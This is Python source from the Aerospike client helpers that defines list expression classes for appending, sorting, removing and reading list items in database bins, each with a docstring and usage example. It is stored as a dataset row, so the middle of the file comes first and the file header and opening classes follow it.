_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListClear(_BaseExpr):
"""Create an expression that removes all items in a list."""
_op = aerospike.OP_LIST_CLEAR
def __init__(self, ctx: TypeCTX, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Clear list value of list nested in list bin "a" index 1.
from aerospike_helpers import cdt_ctx
expr = exp.ListClear([cdt_ctx.cdt_ctx_list_index(1)], "a").compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListSort(_BaseExpr):
"""Create an expression that sorts a list."""
_op = aerospike.OP_LIST_SORT
def __init__(self, ctx: TypeCTX, order: int, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
order (int): Optional flags modifiying the behavior of list_sort. This should be constructed by bitwise or'ing together values from :ref:`aerospike_list_sort_flag`.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get value of sorted list bin "a".
expr = exp.ListSort(None, aerospike.LIST_SORT_DEFAULT, "a").compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {_Keys.LIST_ORDER_KEY: order}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValue(_BaseExpr):
"""Create an expression that removes list items identified by value."""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE
def __init__(self, ctx: TypeCTX, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Value or value expression to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# See if list bin "a", with `3` removed, is equal to list bin "b".
expr = exp.Eq(exp.ListRemoveByValue(None, 3, exp.ListBin("a")), ListBin("b")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueList(_BaseExpr):
"""Create an expression that removes list items identified by values."""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE_LIST
def __init__(self, ctx: TypeCTX, values: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
values (TypeListValue): List of values or list expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove elements with values [1, 2, 3] from list bin "a".
expr = exp.ListRemoveByValueList(None, [1, 2, 3], exp.ListBin("a")).compile()
"""
self._children = (
values,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRange(_BaseExpr):
""" Create an expression that removes list items identified by value range
(begin inclusive, end exclusive). If begin is None, the range is less than end.
If end is None, the range is greater than or equal to begin.
"""
_op = aerospike.OP_LIST_REMOVE_BY_VALUE_RANGE
def __init__(self, ctx: TypeCTX, begin: TypeValue, end: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
begin (TypeValue): Begin value or value expression for range.
end (TypeValue): End value or value expression for range.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove list of items with values >= 3 and < 7 from list bin "a".
expr = exp.ListRemoveByValueRange(None, 3, 7, exp.ListBin("a")).compile()
"""
self._children = (
begin,
end,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRelRankToEnd(_BaseExpr):
"""Create an expression that removes list items nearest to value and greater by relative rank."""
_op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Start value or value expression.
rank (TypeRank): Rank integer or integer expression.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove elements larger than 4 by relative rank in list bin "a".
expr = exp.ListRemoveByValueRelRankToEnd(None, 4, 1, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByValueRelRankRange(_BaseExpr):
""" Create an expression that removes list items nearest to value and greater by relative rank with a
count limit.
"""
_op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE
def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
value (TypeValue): Start value or value expression.
rank (TypeRank): Rank integer or integer expression.
count (TypeCount): How many elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# After removing the 3 elements larger than 4 by relative rank, does list bin "a" include 9?.
expr = exp.GT(
exp.ListGetByValue(None, aerospike.LIST_RETURN_COUNT, 9,
exp.ListRemoveByValueRelRankRange(None, 4, 1, 0, exp.ListBin("a"))),
0).compile()
"""
self._children = (
value,
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndex(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified index."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX
def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Index integer or integer expression of element to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get size of list bin "a" after index 3 has been removed.
expr = exp.ListSize(None, exp.ListRemoveByIndex(None, 3, exp.ListBin("a"))).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndexRangeToEnd(_BaseExpr):
"""Create an expression that removes list items starting at specified index to the end of list."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE_TO_END
def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Starting index integer or integer expression of elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove all elements starting from index 3 in list bin "a".
expr = exp.ListRemoveByIndexRangeToEnd(None, 3, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByIndexRange(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified index."""
_op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE
def __init__(self, ctx: TypeCTX, index: TypeIndex, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
index (TypeIndex): Starting index integer or integer expression of elements to remove.
count (TypeCount): Integer or integer expression, how many elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Get size of list bin "a" after index 3, 4, and 5 have been removed.
expr = exp.ListSize(None, exp.ListRemoveByIndexRange(None, 3, 3, exp.ListBin("a"))).compile()
"""
self._children = (
index,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRank(_BaseExpr):
"""Create an expression that removes list item identified by rank."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK
def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove smallest value in list bin "a".
expr = exp.ListRemoveByRank(None, 0, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRankRangeToEnd(_BaseExpr):
"""Create an expression that removes list items starting at specified rank to the last ranked item."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to start removing at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove the 2 largest elements from List bin "a".
expr = exp.ListRemoveByRankRangeToEnd(None, -2, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListRemoveByRankRange(_BaseExpr):
"""Create an expression that removes "count" list items starting at specified rank."""
_op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE
def __init__(self, ctx: TypeCTX, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
rank (TypeRank): Rank integer or integer expression of element to start removing at.
count (TypeCount): Count integer or integer expression of elements to remove.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: list expression.
Example::
# Remove the 3 smallest items from list bin "a".
expr = exp.ListRemoveByRankRange(None, 0, 3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
#######################
# List Read Expressions
#######################
class ListSize(_BaseExpr):
"""Create an expression that returns list size."""
_op = aerospike.OP_LIST_SIZE
def __init__(self, ctx: TypeCTX, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Integer expression.
Example::
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
"""
self._children = (
bin if isinstance(bin, _BaseExpr) else ListBin(bin),
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValue(_BaseExpr):
""" Create an expression that selects list items identified by value and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or value expression of element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the index of the element with value, 3, in list bin "a".
expr = exp.ListGetByValue(None, aerospike.LIST_RETURN_INDEX, 3, exp.ListBin("a")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRange(_BaseExpr):
""" Create an expression that selects list items identified by value range and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANGE
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_begin: TypeValue,
value_end: TypeValue,
bin: TypeBinName
):
""" Create an expression that selects list items identified by value range and returns selected
data specified by return_type.
Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value_begin (TypeValue): Value or value expression of first element to get.
value_end (TypeValue): Value or value expression of ending element.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get rank of values between 3 (inclusive) and 7 (exclusive) in list bin "a".
expr = exp.ListGetByValueRange(None, aerospike.LIST_RETURN_RANK, 3, 7, exp.ListBin("a")).compile()
"""
self._children = (
value_begin,
value_end,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueList(_BaseExpr):
""" Create an expression that selects list items identified by values and returns selected
data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_LIST
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeListValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeListValue): List or list expression of values of elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
#Get the indexes of the the elements in list bin "a" with values [3, 6, 12].
expr = exp.ListGetByValueList(None, aerospike.LIST_RETURN_INDEX, [3, 6, 12], exp.ListBin("a")).compile()
"""
self._children = (
value,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRangeToEnd(_BaseExpr):
"""Create an expression that selects list items nearest to value and greater by relative rank"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or vaule expression to get items relative to.
rank (TypeRank): Rank intger expression. rank relative to "value" to start getting elements.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the values of all elements in list bin "a" larger than 3.
expr = exp.ListGetByValueRelRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 3, 1, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByValueRelRankRange(_BaseExpr):
""" Create an expression that selects list items nearest to value and greater by relative rank with a
count limit and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_VALUE_RANK_RANGE_REL
def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value (TypeValue): Value or vaule expression to get items relative to.
rank (TypeRank): Rank intger expression. rank relative to "value" to start getting elements.
count (TypeCount): Integer value or integer value expression, how many elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the next 2 values in list bin "a" larger than 3.
expr = exp.ListGetByValueRelRankRange(None, aerospike.LIST_RETURN_VALUE, 3, 1, 2, exp.ListBin("a")).compile()
"""
self._children = (
value,
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndex(_BaseExpr):
""" Create an expression that selects list item identified by index
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_type: int,
index: TypeIndex,
bin: TypeBinName,
):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values
value_type (int): The value type that will be returned by this expression (ResultType).
index (TypeIndex): Integer or integer expression of index to get element at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the value at index 0 in list bin "a". (assume this value is an integer)
expr = exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndexRangeToEnd(_BaseExpr):
""" Create an expression that selects list items starting at specified index to the end of list
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX_RANGE_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
index (TypeIndex): Integer or integer expression of index to start getting elements at.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get element 5 to end from list bin "a".
expr = exp.ListGetByIndexRangeToEnd(None, aerospike.LIST_RETURN_VALUE, 5, exp.ListBin("a")).compile()
"""
self._children = (
index,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByIndexRange(_BaseExpr):
""" Create an expression that selects "count" list items starting at specified index
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_INDEX_RANGE
def __init__(self, ctx: TypeCTX, return_type: int, index: TypeIndex, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
index (TypeIndex): Integer or integer expression of index to start getting elements at.
count (TypeCount): Integer or integer expression for count of elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get elements at indexes 3, 4, 5, 6 in list bin "a".
expr = exp.ListGetByIndexRange(None, aerospike.LIST_RETURN_VALUE, 3, 4, exp.ListBin("a")).compile()
"""
self._children = (
index,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRank(_BaseExpr):
""" Create an expression that selects list item identified by rank
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK
def __init__(
self,
ctx: TypeCTX,
return_type: int,
value_type: int,
rank: TypeRank,
bin: TypeBinName,
):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
value_type (int): The value type that will be returned by this expression (ResultType).
rank (TypeRank): Rank integer or integer expression of element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the smallest element in list bin "a".
expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, aerospike.ResultType.INTEGER, 0, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.VALUE_TYPE_KEY: value_type, _Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRankRangeToEnd(_BaseExpr):
""" Create an expression that selects list items starting at specified rank to the last ranked item
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK_RANGE_TO_END
def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
rank (TypeRank): Rank integer or integer expression of first element to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the three largest elements in list bin "a".
expr = exp.ListGetByRankRangeToEnd(None, aerospike.LIST_RETURN_VALUE, -3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
class ListGetByRankRange(_BaseExpr):
""" Create an expression that selects "count" list items starting at specified rank
and returns selected data specified by return_type.
"""
_op = aerospike.OP_LIST_GET_BY_RANK_RANGE
def __init__(self, ctx: TypeCTX, return_type: int, rank: TypeRank, count: TypeCount, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
rank (TypeRank): Rank integer or integer expression of first element to get.
count (TypeCount): Count integer or integer expression for how many elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the 3 smallest elements in list bin "a".
expr = exp.ListGetByRankRange(None, aerospike.LIST_RETURN_VALUE, 0, 3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
| 44.009597 | 180 | 0.62748 | ##########################################################################
# Copyright 2013-2021 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
List expressions contain expressions for reading and modifying Lists. Most of
these operations are from the standard :mod:`List API <aerospike_helpers.operations.list_operations>`.
Example::
import aerospike_helpers.expressions as exp
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
'''
from __future__ import annotations
from itertools import chain
from typing import List, Optional, Tuple, Union, Dict, Any
import aerospike
from aerospike_helpers import cdt_ctx
from aerospike_helpers.expressions.resources import _GenericExpr
from aerospike_helpers.expressions.resources import _BaseExpr
from aerospike_helpers.expressions.resources import _ExprOp
from aerospike_helpers.expressions.resources import ResultType
from aerospike_helpers.expressions.resources import _Keys
from aerospike_helpers.expressions.base import ListBin
######################
# List Mod Expressions
######################
TypeBinName = Union[_BaseExpr, str]
TypeListValue = Union[_BaseExpr, List[Any]]
TypeIndex = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCTX = Union[None, List[cdt_ctx._cdt_ctx]]
TypeRank = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeCount = Union[_BaseExpr, int, aerospike.CDTInfinite]
TypeValue = Union[_BaseExpr, Any]
TypePolicy = Union[Dict[str, Any], None]
class ListAppend(_BaseExpr):
"""Create an expression that appends value to end of list."""
_op = aerospike.OP_LIST_APPEND
def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
value (TypeValue): Value or value expression to append to list.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if length of list bin "a" is > 5 after appending 1 item.
expr = exp.GT(
exp.ListSize(None, exp.ListAppend(None, None, 3, exp.ListBin("a"))),
5).compile()
"""
self._children = (
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListAppendItems(_BaseExpr):
"""Create an expression that appends a list of items to the end of a list."""
_op = aerospike.OP_LIST_APPEND_ITEMS
def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
value (TypeValue): List or list expression of items to be appended.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: List expression.
Example::
# Check if length of list bin "a" is > 5 after appending multiple items.
expr = exp.GT(
exp.ListSize(None, exp.ListAppendItems(None, None, [3, 2], exp.ListBin("a"))),
5).compile()
"""
self._children = (
value,
_GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}),
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
if policy is not None:
self._fixed[_Keys.LIST_POLICY_KEY] = policy
class ListInsert(_BaseExpr):
